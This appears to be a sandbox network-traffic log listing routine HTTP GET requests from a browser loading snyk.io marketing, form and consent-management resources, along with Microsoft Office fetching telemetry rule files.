Source: global trafficHTTP traffic detected: GET /js/forms2/js/forms2.min.js HTTP/1.1Host: go.snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rs/677-THP-415/images/businessemaildomainonly.js?version=1 HTTP/1.1Host: go.snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /settings/Zz23KCbJ4/latest/languages.json HTTP/1.1Host: api.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v HTTP/1.1Host: v.eps.6sc.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /settings/Zz23KCbJ4/latest/en.json HTTP/1.1Host: api.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /index.php/form/getForm?munchkinId=677-THP-415&form=2940&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&callback=jQuery37105299860925787463_1729799371942&_=1729799371943 HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1660155578%2Fwordpress-sync%2Fintuit-logo.png&w=580&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /settings/Zz23KCbJ4/latest/en.json HTTP/1.1Host: api.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /browser-sdk/4.38.4/cross-domain-bridge.html HTTP/1.1Host: app.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /js/forms2/css/forms2.css HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /js/forms2/css/forms2-theme-simple.css HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /rs/677-THP-415/images/marketo-forms-styles.css HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /index.php/form/getForm?munchkinId=677-THP-415&form=2940&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&callback=jQuery37105299860925787463_1729799371942&_=1729799371943 HTTP/1.1Host: go.snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1660155578%2Fwordpress-sync%2Fintuit-logo.png&w=580&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /session/1px.png?settingsId=Zz23KCbJ4 HTTP/1.1Host: app.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /translations/translations-en.json HTTP/1.1Host: api.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /session/1px.png?settingsId=Zz23KCbJ4 HTTP/1.1Host: app.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php/form/XDFrame HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /translations/translations-en.json HTTP/1.1Host: api.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /aggregate/en?templates=6ySvKQ7jnpjp6y@1.1.0,8eIqa_sKr@8.1.1,9V8bg4D63@9.6.8,9y-4-D2PG@3.3.1,A_gL7a2nQ_pFlo@1.0.0,BJ59EidsWQ@25.7.28,BJTzqNi_i-m@5.3.9,BJz7qNsdj-7@15.8.19,Bklbg5NodobQ@5.0.1,D1_CKTzWP@3.1.2,F-REmjGq7@3.2.1,H1Vl5NidjWX@40.17.45,HkIVcNiuoZX@6.3.4,HkPBYFofN@10.3.1,Hko_qNsui-Q@14.5.15,HkocEodjb7@52.11.41,Hkx754i_iWm@8.3.6,HyP_q4sdobm@10.4.6,JQ2XQxIk@9.6.9,M6Q7giJoz@1.4.3,QAuuBnCiD@1.0.0,QU1vpIg7p@1.0.1,S1_9Vsuj-Q@15.7.22,S1hmcVouiZm@6.2.2,S1pcEj_jZX@21.10.9,S1zkWcVi_oWm@4.2.0,SZJlEEMFe@1.0.1,Sk9kb5VoOi-7@5.1.3,Skj79NodobQ@8.1.3,Sy7BxqEo_oZQ@4.2.0,TeSBtxNX_@1.0.1,V2XAHiqQ9@1.0.1,YaNSRn_HaS-0E9@1.1.0,by3sOSyV-gSwm6@1.1.0,dsS7z9Hv4@1.1.4,e9t04l6TWx1FWs@1.1.0,gkEBFID-V@5.4.5,hQROV2qf7@9.2.4,hy2RKRYpEyupfZ@1.1.0,jzMEq56vW@1.4.3,o5fE0n55PMqzfd@1.1.0,r1HocEjOiWm@7.2.1,rJJjcVouoZ7@8.3.6,ryDQcVoOoZQ@8.2.4,sVUWGhCw7ZYXK8@1.0.0,upbSiLk92JzB4p@1.1.0,zaEwbnbvfaDMAQ@1.1.0 HTTP/1.1Host: aggregator.service.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /aggregate/en?templates=6ySvKQ7jnpjp6y@1.1.0,8eIqa_sKr@8.1.1,9V8bg4D63@9.6.8,9y-4-D2PG@3.3.1,A_gL7a2nQ_pFlo@1.0.0,BJ59EidsWQ@25.7.28,BJTzqNi_i-m@5.3.9,BJz7qNsdj-7@15.8.19,Bklbg5NodobQ@5.0.1,D1_CKTzWP@3.1.2,F-REmjGq7@3.2.1,H1Vl5NidjWX@40.17.45,HkIVcNiuoZX@6.3.4,HkPBYFofN@10.3.1,Hko_qNsui-Q@14.5.15,HkocEodjb7@52.11.41,Hkx754i_iWm@8.3.6,HyP_q4sdobm@10.4.6,JQ2XQxIk@9.6.9,M6Q7giJoz@1.4.3,QAuuBnCiD@1.0.0,QU1vpIg7p@1.0.1,S1_9Vsuj-Q@15.7.22,S1hmcVouiZm@6.2.2,S1pcEj_jZX@21.10.9,S1zkWcVi_oWm@4.2.0,SZJlEEMFe@1.0.1,Sk9kb5VoOi-7@5.1.3,Skj79NodobQ@8.1.3,Sy7BxqEo_oZQ@4.2.0,TeSBtxNX_@1.0.1,V2XAHiqQ9@1.0.1,YaNSRn_HaS-0E9@1.1.0,by3sOSyV-gSwm6@1.1.0,dsS7z9Hv4@1.1.4,e9t04l6TWx1FWs@1.1.0,gkEBFID-V@5.4.5,hQROV2qf7@9.2.4,hy2RKRYpEyupfZ@1.1.0,jzMEq56vW@1.4.3,o5fE0n55PMqzfd@1.1.0,r1HocEjOiWm@7.2.1,rJJjcVouoZ7@8.3.6,ryDQcVoOoZQ@8.2.4,sVUWGhCw7ZYXK8@1.0.0,upbSiLk92JzB4p@1.1.0,zaEwbnbvfaDMAQ@1.1.0 HTTP/1.1Host: aggregator.service.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
